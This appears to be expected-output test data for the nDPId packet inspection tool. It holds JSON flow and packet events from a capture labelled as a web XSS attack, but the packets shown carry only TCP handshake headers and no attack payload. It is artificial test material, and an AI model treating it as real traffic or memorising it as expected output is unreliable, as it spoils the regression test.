+00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347134702,"flow_last_seen":1499347140651,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347262689,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53974,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347137239,"flow_last_seen":1499347142652,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347262689,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54000,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347137239,"flow_last_seen":1499347142652,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347262689,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54000,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347263542,"flow_last_seen":1499347263542,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347263542,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55334,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":173,"flow_packet_id":1,"flow_last_seen":1499347263542,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347263542,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8VDNAAD4GcZ2sEAABwKgKMtgmAFA8SlzqAAAAAKACchDjRQAAAgQFtAQCCAoBOgjZAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2464,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":173,"flow_packet_id":2,"flow_last_seen":1499347263542,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347263542,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2CaW4NetPEpc66AScSCXYwAAAgQFtAQCCAoD49pPAToI2QEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2465,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":173,"flow_packet_id":3,"flow_last_seen":1499347263543,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347263543,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0VDRAAD4GcaSsEAABwKgKMtgmAFA8SlzrluDXroAQAOU2awAAAQEICgE6CNkD49pP"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2476,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347264804,"flow_last_seen":1499347264804,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347264804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55348,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2476,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":1,"flow_last_seen":1499347264804,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347264804,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NPtAAD4GkNWsEAABwKgKMtg0AFDy7j7vAAAAAKACchBJUwAAAgQFtAQCCAoBOgoUAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2477,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":2,"flow_last_seen":1499347264805,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347264805,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2DSLlcK98u4+8KAScSAccQAAAgQFtAQCCAoD49uKAToKFAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2478,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":3,"flow_last_seen":1499347264805,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347264805,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NPxAAD4GkNysEAABwKgKMtg0AFDy7j7wi5XCvoAQAOW7eAAAAQEICgE6ChQD49uK"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2487,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347266097,"flow_last_seen":1499347266097,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347266097,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55362,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2487,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":1,"flow_last_seen":1499347266097,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347266097,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8FmFAAD4Gr2+sEAABwKgKMthCAFDvjR02AAAAAKACchBtHAAAAgQFtAQCCAoBOgtXAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2488,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":2,"flow_last_seen":1499347266098,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347266098,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2ELPgbsz740dN6AScSAClAAAAgQFtAQCCAoD49zOAToLVwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2489,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":3,"flow_last_seen":1499347266098,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347266098,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0FmJAAD4Gr3asEAABwKgKMthCAFDvjR03z4G7NIAQAOWhmgAAAQEICgE6C1gD49zO"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2496,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347267376,"flow_last_seen":1499347267376,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347267376,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55376,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2496,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":176,"flow_packet_id":1,"flow_last_seen":1499347267376,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347267376,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8e\/BAAD4GSeCsEAABwKgKMthQAFA8R3dnAAAAAKACchDE4wAAAgQFtAQCCAoBOgyXAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2497,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":176,"flow_packet_id":2,"flow_last_seen":1499347267376,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347267376,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2FDz+hz2PEd3aKAScSDS4AAAAgQFtAQCCAoD494NAToMlwEDAwc="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2498,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":176,"flow_packet_id":3,"flow_last_seen":1499347267377,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347267377,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0e\/FAAD4GSeesEAABwKgKMthQAFA8R3do8\/oc94AQAOVx6AAAAQEICgE6DJcD494N"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2508,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347268659,"flow_last_seen":1499347268659,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347268659,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55390,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2508,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":1,"flow_last_seen":1499347268659,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347268659,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83S9AAD4G6KCsEAABwKgKMtheAFDSkdD3AAAAAKACchDTuQAAAgQFtAQCCAoBOg3YAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2509,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":2,"flow_last_seen":1499347268659,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347268659,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2F43lkso0pHQ+KAScSBuqAAAAgQFtAQCCAoD499OAToN2AEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2510,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":3,"flow_last_seen":1499347268659,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347268659,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03TBAAD4G6KesEAABwKgKMtheAFDSkdD4N5ZLKYAQAOUNsAAAAQEICgE6DdgD499O"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2529,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347271162,"flow_last_seen":1499347271162,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347271162,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55416,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2529,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":1,"flow_last_seen":1499347271162,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347271162,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86ilAAD4G26asEAABwKgKMth4AFDbDvpjAAAAAKACchCfRAAAAgQFtAQCCAoBOhBKAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2530,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":2,"flow_last_seen":1499347271163,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347271163,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2HgbmHvT2w76ZKAScSAjFAAAAgQFtAQCCAoD4+HAAToQSgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":3,"flow_last_seen":1499347271163,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347271163,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06ipAAD4G262sEAABwKgKMth4AFDbDvpkG5h71IAQAOXCGwAAAQEICgE6EEoD4+HA"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2541,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347272469,"flow_last_seen":1499347272469,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347272469,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55430,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2541,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":179,"flow_packet_id":1,"flow_last_seen":1499347272469,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347272469,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8wnhAAD4GA1isEAABwKgKMtiGAFBxpNPoAAAAAKACchAt1gAAAgQFtAQCCAoBOhGQAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":179,"flow_packet_id":2,"flow_last_seen":1499347272469,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347272469,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2IbhJKqDcaTT6aAScSC8IQAAAgQFtAQCCAoD4+MHAToRkAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2544,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":179,"flow_packet_id":3,"flow_last_seen":1499347272470,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347272470,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0wnlAAD4GA1+sEAABwKgKMtiGAFBxpNPp4SSqhIAQAOVbKAAAAQEICgE6EZED4+MH"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347138552,"flow_last_seen":1499347143653,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347272693,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54014,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347138552,"flow_last_seen":1499347143653,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347272693,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54014,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347141111,"flow_last_seen":1499347146653,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347272693,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54040,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347141111,"flow_last_seen":1499347146653,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347272693,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54040,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347142412,"flow_last_seen":1499347147653,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347272693,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54054,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347142412,"flow_last_seen":1499347147653,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347272693,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54054,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347143676,"flow_last_seen":1499347149654,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347272693,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54068,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347143676,"flow_last_seen":1499347149654,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347272693,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54068,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347146267,"flow_last_seen":1499347151654,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347272693,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54094,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347146267,"flow_last_seen":1499347151654,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347272693,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54094,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347147523,"flow_last_seen":1499347152654,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347272693,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54108,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347147523,"flow_last_seen":1499347152654,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347272693,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54108,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2556,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347273742,"flow_last_seen":1499347273742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347273742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55444,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2556,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":180,"flow_packet_id":1,"flow_last_seen":1499347273742,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347273742,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8s+tAAD4GEeWsEAABwKgKMtiUAFBek6EkAAAAAKACchByXgAAAgQFtAQCCAoBOhLPAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2557,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":180,"flow_packet_id":2,"flow_last_seen":1499347273742,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347273742,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2JQ5PiSKXpOhJaAScSAtTAAAAgQFtAQCCAoD4+RFAToSzwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2558,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":180,"flow_packet_id":3,"flow_last_seen":1499347273743,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347273743,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0s+xAAD4GEeysEAABwKgKMtiUAFBek6ElOT4ki4AQAOXMUwAAAQEICgE6Es8D4+RF"} 